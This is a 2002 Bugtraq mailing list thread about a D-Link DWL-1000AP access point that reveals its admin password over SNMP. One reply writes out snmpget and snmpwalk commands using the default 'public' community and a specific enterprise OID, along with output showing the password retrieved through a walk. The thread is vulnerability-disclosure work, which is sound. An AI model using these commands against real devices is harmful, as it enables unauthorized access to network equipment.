Bugtraq mailing list archives
Re: D-Link DWL-1000AP can be compromised because of SNMP configuration
From: "David" <megor () home com>
Date: Wed, 23 Jan 2002 23:50:14 -0800
The bug in the access point only reveals the password if you call for it by doing a snmp walk which uses a next request to get the oid instead of calling it explicitly. I tried: #snmpget 192.168.0.10 public enterprises.937.2.1.2.2.0 enterprises.937.2.1.2.2.0 = "" #snmpwalk 192.168.0.10 public enterprises.937.2.1.2.2.0 enterprises.937.2.1.2.2.0 = "" Both explicit calls to the oid fail but if I use next to call that oid I get #snmpwalk 192.168.0.10 public enterprises.937.2.1.2.2 enterprises.937.2.1.2.2.0 = "mypw" Here is my access point info: system.sysDescr.0 = D-Link - WLAN Access Point, Version: 3.2.28 #483 (Aug 23 2001). ----- Original Message ----- From: "Jim" <raxor () dexlink com> To: <bugtraq () securityfocus com> Sent: Wednesday, January 23, 2002 11:15 AM Subject: Re: D-Link DWL-1000AP can be compromised because of SNMP configuration
In-Reply-To: <20011221192655.6657.qmail () mail securityfocus com> OID 1.3.6.1.4.1.937.2.1.2.2.0 doesn't seem to exist on my DWL-1000AP. Is this a typo ? Or has this value changed with a recent firmware update ?
Current thread:
- Re: D-Link DWL-1000AP can be compromised because of SNMP configuration Jim (Jan 23)
- Re: D-Link DWL-1000AP can be compromised because of SNMP configuration David (Jan 24)